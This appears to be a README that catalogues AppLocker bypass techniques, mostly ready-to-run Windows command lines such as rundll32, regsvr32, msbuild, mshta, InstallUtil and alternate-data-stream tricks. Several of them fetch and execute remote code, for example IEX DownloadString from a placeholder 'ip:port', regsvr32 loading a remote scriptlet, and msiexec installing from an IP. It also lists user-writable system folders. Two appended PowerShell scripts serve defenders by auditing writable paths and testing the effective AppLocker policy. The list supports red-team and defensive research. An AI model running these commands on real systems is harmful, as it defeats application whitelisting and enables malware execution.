The goal of this repository is to document the most common techniques to bypass AppLocker. This README contains a complete list of all known bypasses. Since AppLocker can be configured in different ways it makes sense to have a master list of bypasses; this README.MD is that master list and will be updated with known and possible AppLocker bypasses.
I have created a list of verified bypasses that work against the default rules created with AppLocker.
For details on how I verified them and how to create the default rules, see my blog: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
VerifiedBypasses-DefaultRules.MD
Please contribute, and do point out errors or resources I have forgotten.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
rundll32 shell32.dll,Control_RunDLL payload.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes: I only tested on Windows 10 against the default rules; it could work against older Windows versions.
- Links:
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes: I only tested on Windows 10 against the default rules; it could work against older Windows versions.
- Links:
msbuild.exe pshell.xml
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
- http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
- https://github.com/Cn33liz/MSBuildShell
- https://github.com/Cn33liz/MS17-012
- https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- https://www.youtube.com/watch?v=aSDEAPXaz28
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
regsvcs.exe /U regsvcs.dll
regsvcs.exe regsvcs.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
regasm.exe /U regsvcs.dll
regasm.exe regsvcs.dll
- Requires admin: No when run with /U (unregister); registering without /U requires admin
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
bginfo.exe bginfo.bgi /popup /nolicprompt
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: No
Notes: Will work if BGinfo.exe is located in a path that is trusted by the policy.
- Links:
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
- https://github.com/subTee/AllTheThings
- https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
- http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Open .diagcab package
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
mshta.exe evilfile.hta
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
- Links:
cmd.exe /k < script.txt
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
Get-Content script.txt | iex
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
cscript.exe //E:vbscript script.txt
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: No
Notes:
- Links:
Missing Example
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
Missing Example
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
ieexec.exe http://x.x.x.x:8080/bypass.exe
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
cdb.exe -cf x64_calc.wds -o notepad.exe
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
dnx.exe consoleapp
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
rcsi.exe bypass.csx
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
Missing example
- Requires admin: ?
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
Control.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
msxsl.exe customers.xml script.xsl
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
msiexec /quiet /i cmd.msi
msiexec /q /i http://192.168.100.3/tmp/cmd.png
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Can also execute scriptlets (see links).
- Links:
- https://twitter.com/NickTyrer/status/958450014111633408
- https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
xwizard.exe argument1 argument2
DLL loading in same folder xwizard.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
fsi.exe c:\folder\d.fscript
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
odbcconf -f file.rsp
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
te.exe bypass.wsc
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: Can be used if the Test Authoring and Execution Framework (TAEF) is installed in a path that is whitelisted. Default location: C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF
- Links:
The following folders are by default writable and executable by normal users
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
- Requires admin: No
- Windows binary: N/A
- Bypasses AppLocker Default rules: ?
Notes: This list is based on Windows 10 1709. Run accesschk (Sysinternals) to verify on other Windows versions.
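The folder list above was checked with accesschk; as an added example (not part of the original list), the following PowerShell does the same check with built-in tooling by trying to create and delete a file in every directory under the Windows folder from an unelevated prompt. The probe file name and the search root are assumptions for illustration.

```powershell
# Added example, not part of the original list: find directories under %WINDIR% that the
# current (unelevated) user can create files in, by attempting a create-then-delete of a
# probe file in each one. The root and the probe name are assumptions; adjust as needed.
$root  = $env:windir
$probe = 'applocker-write-probe-{0}.tmp' -f [guid]::NewGuid()

function Test-WritableDirectory {
    param([string]$Directory)
    $target = Join-Path $Directory $probe
    try {
        [IO.File]::WriteAllText($target, 'probe')
    } catch {
        return $false        # access denied (or path too long): not writable for this user
    }
    try {
        [IO.File]::Delete($target)
    } catch {
        # Some directories allow create but not delete; still report them as writable.
        Write-Warning "Created but could not delete $target - remove it manually"
    }
    return $true
}

$writable = Get-ChildItem -Path $root -Directory -Recurse -ErrorAction SilentlyContinue |
    Where-Object { Test-WritableDirectory -Directory $_.FullName } |
    Select-Object -ExpandProperty FullName

# Every path printed here sits under the default "Allow all files located in the Windows folder"
# path rule, so a standard user can both drop and execute a file there unless an exception exists.
$writable
```

Compare the output with the exceptions in your AppLocker path rules: any directory listed here that is not excluded from the %WINDIR%\* allow rule (or covered by a deny rule) is a place a standard user can stage and run binaries, which is why publisher or hash rules are preferred over the default path rules.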
ATBroker.exe /start malware
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
wmic process call create calc
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
slmgr.vbs
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires the registry keys for the COM object to be created first.
- Links:
winrm quickconfig
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires the registry keys for the COM object to be created first.
- Links:
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
InfDefaultInstall.exe shady.inf
- Requires admin: ?
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Only works on Windows 7? Windows 10 requires admin or a digitally signed INF.
- Links:
winword.exe /l dllfile.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: No commonly shared example DLL file.
runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes:
- Links:
Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: Part of Visual Studio. Requires TrackerUI.dll to be present in the 1028 subfolder.
script.wsf
- Requires admin: No
- Windows binary: No
- Bypasses AppLocker Default rules: ?
Notes: .WSF is not one of the script types covered by AppLocker's script rules (.ps1, .bat, .cmd, .vbs, .js), so .WSF files are not blocked.
- Links:
Powershell -version 2
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Bypasses Constrained Language Mode. Requires the PowerShell 2.0 engine (.NET Framework 3.5) to be installed on the host.
- Links:
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
SyncInvoke <executable> [args]
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present
Notes: Requires PowerShell version 2
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
type notepad_reflective_x64.dll > c:\windows\tasks\zzz:notepad_reflective_x64.dll
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: ?
Notes: Requires write access to a place that is allowed by AppLocker
- Links:
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
Notes:
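Most entries above carry a "Bypasses AppLocker Default rules" column; what matters in practice is what your own effective policy does with each binary. The following PowerShell is an added example (not part of the original list) that resolves the Windows-native binaries named in this README and asks the host's effective AppLocker policy whether a given user may execute them, using the built-in AppLocker module. The candidate list and the user identity are assumptions for illustration and can be extended.

```powershell
# Added example, not part of the original list: evaluate which of the Windows-native binaries
# listed in this README the host's *effective* AppLocker policy allows a given user to execute.
# Uses the built-in AppLocker module (Windows 8 / Server 2012 and later); no elevation required.
# The candidate list and $user are assumptions for illustration.
$user = 'Everyone'   # or 'DOMAIN\user' or a SID; rules are evaluated for this identity

$candidates = 'rundll32.exe', 'regsvr32.exe', 'msbuild.exe', 'regsvcs.exe', 'regasm.exe',
              'installutil.exe', 'mshta.exe', 'cscript.exe', 'ieexec.exe', 'control.exe',
              'msiexec.exe', 'cmstp.exe', 'xwizard.exe', 'odbcconf.exe', 'ATBroker.exe',
              'wmic.exe', 'MavInject32.exe', 'forfiles.exe', 'SyncAppvPublishingServer.exe',
              'InfDefaultInstall.exe', 'runscripthelper.exe', 'powershell.exe'

# The .NET binaries (msbuild, regsvcs, regasm, installutil, ieexec) live under
# Microsoft.NET\Framework*, the rest under System32/SysWOW64, so search all three roots.
$roots = "$env:windir\System32", "$env:windir\SysWOW64", "$env:windir\Microsoft.NET"
$paths = Get-ChildItem -Path $roots -Recurse -File -Include $candidates -ErrorAction SilentlyContinue |
         Select-Object -ExpandProperty FullName -Unique

$policy  = Get-AppLockerPolicy -Effective
$results = Test-AppLockerPolicy -PolicyObject $policy -Path $paths -User $user

# Full table: which rule (if any) produced each decision.
$results | Sort-Object PolicyDecision, FilePath |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Summary: every Allowed/AllowedByDefault path is a live starting point for the techniques above.
$allowed = $results | Where-Object { $_.PolicyDecision -like 'Allowed*' } |
           Select-Object -ExpandProperty FilePath
'{0} of {1} candidate binaries are executable by {2}' -f @($allowed).Count, @($paths).Count, $user
```

With only the default rules in place everything under %WINDIR% comes back as Allowed via the path rule, which is exactly what the "Bypasses AppLocker Default rules: Yes" entries above exploit. Add deny rules (or publisher-based allow rules) for the binaries you do not need and re-run the script to confirm the decisions change before relying on the policy.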